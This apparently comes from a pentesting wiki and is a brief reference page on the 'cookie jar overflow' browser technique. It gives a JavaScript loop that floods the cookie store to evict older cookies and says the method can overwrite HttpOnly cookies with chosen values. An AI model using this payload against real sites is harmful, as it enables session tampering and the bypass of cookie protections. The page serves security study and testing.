# Cookie Jar Overflow

The browsers have a **limit on the number of cookies** that they can store for a page. Then, if for some cause you need to **make a cookie disappear**, you can **overflow the cookie jar** as the oldest ones will be deleted before:

```javascript
// Set many cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
    document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}
```

Notice, that third party cookies pointing to a different domain won't be overwritten.

{% hint style="danger" %}
This attack can also be used to **overwrite HttpOnly cookies as you can delete it and then reset it with the value you want**.

Check this in [**this post with a lab**](https://www.sjoerdlangkemper.nl/2020/05/27/overwriting-httponly-cookies-from-javascript-using-cookie-jar-overflow/).
{% endhint %}